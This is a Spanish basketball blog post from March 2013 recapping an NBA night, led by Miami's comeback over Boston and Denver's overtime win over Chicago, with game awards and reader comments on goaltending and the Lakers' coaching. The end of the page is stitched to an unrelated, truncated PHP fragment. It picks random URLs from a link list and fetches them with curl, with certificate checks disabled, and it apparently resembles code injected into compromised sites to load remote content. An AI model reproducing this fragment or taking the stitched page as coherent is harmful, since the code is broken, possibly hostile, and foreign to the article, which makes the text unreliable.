La Crónica: Las rachas continúan

19 de March de 2013 por Simon

Miami continúa su ritmo imparable aunque ayer ante Boston Celtics tuvieron que sudar la gota gorda para llevarse el partido. En la primera parte, Miami estaba demasiado ansioso, como si todo este tema de la racha ganadora los tuviera un poco despistados lo que permitió a los Celtics conseguir ventajas que rozaron los 20 puntos durante la primera mitad. En la segunda, unos Heat más centrados consiguieron jugar a un ritmo más adecuado para ellos y a falta de 9 segundos, con empate en el marcador, Lebron anotó un tiro lejano para poner a su equipo dos arriba. En la última posesión una gran defensa de Battier primero y el fallo de Pierce después, finiquitaron el partido. Aunque paezca imposible, anoche Lebron James mostró una versión mejorada de sí mismo, terminando el partido con 37 puntos, 12 asistencias y 7 rebotes y siendo clave en la remontada de su equipo, aunque el verdadero protagonista del encuentro no fue James, sino un verde, Jeff Green, que  jugó el mejor partido de su carrera y terminó el partido con 43 puntos (105-103).

Otro equipo absolutamente imparable en estos momentos son los Denver Nuggets de George Karl que ayer vencieron, con prórroga, a Chicago Bulls. Denver  llevó la voz cantante durante todo el encuentro pero un buen final de partido de Chicago les dio opciones de llevarse el partido. Con empate en el marcador, Lawson falló sobre la bocina y el partido se fue a la prórroga. En ella el encuentro siguió los pasos del último cuarto con ambos equipos intercambiando canastas y el pequeñín Robinson sosteniendo a su equipo. Con Denver dos abajo el balón llego llorando a las manos de Iguodala que con un forzado triple puso por delante a Denver. En el último ataque Noah cometió una infracción interceptando antes de tiempo el tiro de Bellinelli, por lo que el partido terminó con esa acción (119-118). 

Los máximos rivales de Nuggets en estos momentos, Memphis Grizzlies, vencieron ayer con suma comodidad a Minnesota Timberwolves que apenas plantaron cara. Con la primera mitad hubiera valido para dar por concluido el partido.  Por parte de Memphis fueron 5 los jugadores en dobles dígitos. En el mal partido de los Wolves ayer, destacó la mala noche de Rubio que no tuvo su día y eso lo notó su ya de por sí débil equipo (77-92).

En la lucha por los Play Off del Oeste, Lakers cayó  con estrepito ante Phoenix Suns (76-99). Tras 3 primeros cuartos igulados, los jugadores de Los Angeles se fueron del partido y solo fueron capaces de anotar unos patéticos 10 puntos en el último cuarto mientras los Suns se aprovechaban de sus facilidades defensivas. Flaco favor para Kobe Bryant que puede verse obligado a forzar y volver antes de tiempo. Menos mal para ellos que Utah no parece que vaya a levantar cabeza. Ayer cayeron en casa ante unos New York Knicks  sin sus tres principales jugadores pero con un Felton y un JR Smith jugando a un gran nivel (90-83).

En la zona noble del Este destacan las victorias fáciles de Indiana y Brooklyn sobre Cleveland y Detroit respectivamente. Los de Indiana tuvieron, sorprendentemente,  en Gerald Green a su mejor hombre, que fue el que rompió el partido en el segundo cuarto de manera definitiva a favor de su equipo (111-90). Por su parte, Deron Williams va confirmando poco a poco que tras el All-Star su nivel ha crecido un poco  y ayer continuó esta línea ascendente con 31 puntos y aumentar la distancia a sus perseguidores en la conferencia Este (119-82). Precisamente el más inmediato perseguidor de Brooklyn, Atlanta Hawks, perdió de manera clara ante Dallas Mavericks (127-113) tras una gran primera parte de los Mavericks que contaron con Collison como su mejor jugador con 24 puntos a los que añadió 5 asistencias.  En Atlanta hasta ocho jugadores acabaron en dobles dígitos pero de poco sirvió. Golden State cumplió ante New Orleans con una sencilla victoria que les distancia de los Rockets y que prácticamente les asegura terminar sextos del Oeste ya que gozan de mucha distancia sobre el séptimo y se encuentran lejos del quinto (93-72). Curry anotó 30 puntos para ser el máximo anotador de su equipo.

En los bajos fondos de la liga, ayer vimos a Charlotte ganar en casa a Washington Wizards (114-119) con un Henderson desatado autor de 27 puntos y 8 asistencias que hicieron inútiles los 25 puntos de John Wall. Por su parte, Philadelphia venció en casa a los Blazers, con un gran Hawes de nuevo y un impresionante Jrue Holiday. Terminó con 27 puntos, 8 rebotes y 6 asistencias. Los partidazos de Aldridge y Lillard quedaron en nada al fallar Aldridge el último ataque (100-101). Ayer se confirmó que Andrew Bynum se perderá toda la temporada al operarse de ambas rodillas. A estas alturas de la temporada no lo podemos considerar ni una mala noticia para los Sixers.

PREMIOS

MVP: 37 puntos, 12 asistencias, 7 rebotes y una actuación sublime en los momentos calientes del partido. Lebron James ha alcanzado otro nivel.

Rookie: Otra exhibición de Damian Lillard. El base de los Blazers anotó 27 puntos y además repartió 7 asistencias y capturó 7 rebotes. A lo mejor el año que viene lo vemos ya en All-Stars.

Sorpresa: Nate Robinson sostuvo a los Bulls durante todo el partido merced a sus 34 puntos, destacando, sobretodo, un triple en los segundos finales del tiempo reglamentario que envió el partido a la prórroga.

Decepción: Robin Lopez capturó solo 2 rebotes y además falló 8 de los 10 tiros que intentó. Estuvo aún más gris que el resto de sus compañeros. Evan Turner, en cambio, fue la oveja negra de su equipo al anotar solo 2 puntos.

Esfuerzo en vano: 43 puntos y 7 rebotes y te vas para casa con derrota. No hay razones para que Jeff Green esté contento. Los 32 puntos y 14 rebotes de Lamarcus Aldridge también se quedaron sin premio.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Gran jornada, muchos partidos, sorpresas, canastas ganadoras, prórrogas… tiene de todo 😀

    Lakers “cayó”, corregidlo cuando podáis 🙂 creo que llegaron demasiado fundidos al último cuarto, a causa del back-to-back y la rotación tan corta en estos momentos. D’Antoni diciendo que necesitan que Pau vuelva de titular ya, ¿palabras de cara a la galería o realidad debida al pequeño bajón de Earl Clark?

    Muy buena la crónica Simon, en cuanto pueda me pasaré por NBA.com a ver los vídeos de todos los partidos. Enhorabuena por el trabajo.

      Citar

  2. diestro dice:
    #2

    Ayer estuve viendo el partido del TD Garden y mereció la pena dormir poco. Boston todo el partido por delante con cómodas ventajas, y con un Green como nunca, metiendolas de todos los colores. Pero cuando juegas contra el animalito Lebron, ¿cuantos puntos es una ventaja cómoda?

    A falta de 10 minutos debían ir ganando de 13 y los remontaron con una suficiencia que asusta. Lo de Lebron es espectacular, porque tiraba y en caso de fallar cogía su propio rebote ante dos tíos de Boston. Increible lo de este tio

      Citar

  3. Juanra dice:
    #3

    Una pregunta: ¿Por qué es ilegal el palmeo de Noah?

      Citar

  4. rumbero dice:
    #4

    Fue un partidazo, digno de PO. Está muy bonita la rivalidad que se ha montada. El inicio de partido de Green fue descomunal, enchufándolas de todos lados, de ahí la diferencia en la primera parte, pero se intuía que Miami pondría el martillo pilón para recuperar la desventaja. James se fue adueñando del partillo y resultó imprable al final. Le pone el Garden. Y ayer mostraron mucha suficiencia pero al menos se les vió sudando un poco. Recordaba a las series de la temporada pasada. Ojalá se puedan repetir en esta porque aun con la diferencia de nivel que hay no dudo que los verdes lo pelarían a muerte. Todos mis respetos para ellos.

    Juanra:
    Una pregunta: ¿Por qué es ilegal el palmeo de Noah?

    Ahí lo que pitan los árbitros es “goaltending”. Consideran que Noah interfiere en el tiro de Bellineli cuando la pelota ya está bajando. La duda que tengo yo es si se tiene en cuenta que la pelota esté dentro del cilindro imaginario que forma el aro (porque en la repetición no lo parece) o si sólo con la trayectoria ya vale para pitar. Polémica en cualquier caso. Incluso habrá el que diga que eso era un alley oop 😀

      Citar

  5. Jose Luis dice:
    #5

    Pitan goaltending, el balón va en dirección hacia el aro y no puedes moverlo o empujarlo para asegurarte que entre. La verdad es que no hubiera entrado sin tocarla Noah, hubiera dado en el aro y pasaría por encima hacia el otro lado.

    Pero vamos, Koufos para mí hizo otro goaltending un poco antes y no lo pitaron… mal trabajo de los árbitros.

      Citar

  6. Ruxixón dice:
    #6

    Vaya partido de Wilson Chandler contra Chicago.La verdad es que las variantes desde el banquillo de George Karl son tremendas,y no es sólo Chandler,Brewer suele aportar con regularidad,Andre Miller es un experto en lo suyo y McGee deja pinceladas entre sus muchas payasadas.En lo negativo me preocupa el rendimiento de Faried.Se ha hecho un hueco en la liga en base a su intensidad pero es un jugador que debe trabajar mucho en verano sus movimientos ofensivos porque sus recursos son muy limitados.Si fuera capaz estaríamos hablando de un notable jugador.

    Utah ahora mismo es el segundo peor equipo del oeste en los últimos 10 partidos,sólo por detrás de los Hornets y empatados con los Timberwolves.Unos tanqueando y otros bajo mínimos.Los Jazz “jugándose” los PO.Lo que ya dije,les pilla tarde para tanquear porque con lo que tienen a día de hoy no van a ningún lado.Reconstrucción en verano.Los Lakers pueden estar tranquilos.

    Tenía que haber apostado dinero a que Bynum no se pondría la camiseta de los 76ers esta temporada….ambas rodillas se va a operar.Vamos a ver cómo vuelve pero viendo antecedentes y demás,no sé qué carrera le quedará a este chico.Ahora bien,¿qué juicio se puede hacer de la gestión de los 76ers?Sólo ha sido mala suerte,¿alguien ha arriesgado más de lo debido?,¿era necesario ese riesgo?Lo mejor de todo es que en verano pueden arreglarlo,dudo que no busquen otro interior de más garantías,al menos en cuanto a lesiones se refiere.

    Let’s go Heat!

      Citar

  7. MagicJohnson32 dice:
    #7

    Jose Luis:
    Pitan goaltending, el balón va en dirección hacia el aro y no puedes moverlo o empujarlo para asegurarte que entre.

    Pero sólo es infracción si el balón está en la zona correspondiente al cilindro imaginario por encima del aro. Si no está dentro de ese cilindro no hay infracción (sería como un alleyoop). La verdad es que es difícil de decir pero parece que acertaron en ésa señalización por milímetros. Eso sí, fallaron en la de Koufos.

    Qué partidazo en el Garden, sensacional. Lo de los últimos cuartos de los Heat (y en concreto de LeBron) es una cosa brutal, dan la impresión de que no hay renta suficiente ante ellos, que siempre van a ser capaces de remontar como si nada.

    De los Lakers mejor no digo nada.

      Citar

  8. Esteban dice:
    #8

    lo de bynum es gracioso, fichado a cambio de tu “estrella” con un solo año de contrato, y no va a jugar ningun partido, creo que estamos en presencia de uno de los peores fichajes de la historia y aun asi, no estoy segureo que los 76ers no le vayan a hacer una oferta este año, incluso seguro habra varios equipos ren que le haran una oferta, se la han hecho a oden…

      Citar

  9. Esteban dice:
    #9

    por otra parte que aburrida se me antoja la carrera al bicampeonato del HEAT, hoy no se ve un equipo capaz de hacerles sombra, quiza howard, pau, jamison y clark podrian lastimar su juego interno pero de ninguna manera llegaran a final de conferencia

    yo tenia mis esperanzas en west y hibbert, pero desp del ultimo enfrentamiendo, sus acciones caen bajo bajo

      Citar

  10. nba dice:
    #10

    Esteban los Lakers bastante tienen con llegar a playoffs, y mas si D’antoni sigue emperrado en una rotación tan corta, el tio este ya esta mencionando a Gasol, para asi presionar un poco mas su puesta punto, en vez de eso que bien vendrían que los agitatoallas del banquillo Laker jugasen mas minutos contra rivales de menor nivel, pero no ahi siguen D’antoni empeñado en llevarse el wcy, (worst coach of the year)…

      Citar

  11. MagicJohnson32 dice:
    #11

    nba:
    Esteban los Lakers bastante tienen con llegar a playoffs, y mas si D’antoni sigue emperrado en una rotación tan corta, el tio este ya esta mencionando a Gasol, para asi presionar un poco mas su puesta punto, en vez de eso que bien vendrían que los agitatoallas del banquillo Laker jugasen mas minutos contra rivales de menor nivel, pero no ahi siguen D’antoni empeñado en llevarse el wcy, (worst coach of the year)…

    Con esa misma fórmula fue Coach of the Year con los Suns.

    Además, cuando Kobe y Pau vuelvan, la rotación va a ser de 9, que ya es una cifra normal para las alturas de temporada en las que estamos.

      Citar

  12. Esteban dice:
    #12

    worst coach of the year? solo del año?

    yo en mi vida h visto manejar una plantilla tan tan tan mal, incluso, d´antoni es tan mal entrenador que la lesion de gasol le beneficio, porque con el nunca le encontro ni minimamente un funcionamiento al equipo y debia dejarlo en cancha, sin gasol parece tener menos compromiso de usarlo y mal, y han jugado mejor

    repito, nunca he visto a alguien administrar tan pesimamente sus elementos, hubo una parte de la temporada con jamison salio de la rotacion, cuando deberia ser y casi es, candidato al sexto hombre del año

    hubo juegos con meeks no entro en la rotacion, cuando es lejos el mejor perimentral suplente de los lakers

    destruyo el juego de gasol, a tal punto q termino de suplente

    eubanks nisiquiera entra en la rotacion

    solo esta ultima remontada y la mejora general, salva un poco lo que ha arruinado de los rendimientos de nash y howard

      Citar

  13. Jose Luis dice:
    #13

    D’Antoni ha sido pésimo, espero que para el año que viene esté fuera.

    No sé de qué vale tener una plantilla de 100 millones $ si luego la dejas en manos de un entrenador mediocre… por ahorrarte 6 millones $ en el salario del entrenador bueno que sabes que ha ganado anillos y que con este equipo tendría muchas probabilidades de ganar uno en estos 2-3 años. No digo que fueran favoritos, pero estarían entre los 4 contenders fijo.

      Citar

  14. Simon dice:
    #14

    bueno bueno, Denver ganando en Oklahoma, y ya son 4º por balance… aunque Clippers siga cuarto por ser el campeon de division pero ojo porque ya no tendrían la ventaja de campo.

      Citar

  15. Simon dice:
    #15

    Por cierto ojo con los números de Miami, ahora tiene salida a Cleveland, y despues recibe a Detroit y Charlotte para luego visitar a Orlando, @Bulls, @NOH @Spurs, recibe a NYK y luego tiene Chrlotte,sixers, Milwaukee y Washington.
    Los proximos 12 solo tienen un Back to Back ( Charlotte + Orlando ) y sólo un par de partidos comprometidos en esos partidos… ojito porque si no se despitan es posible el record

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>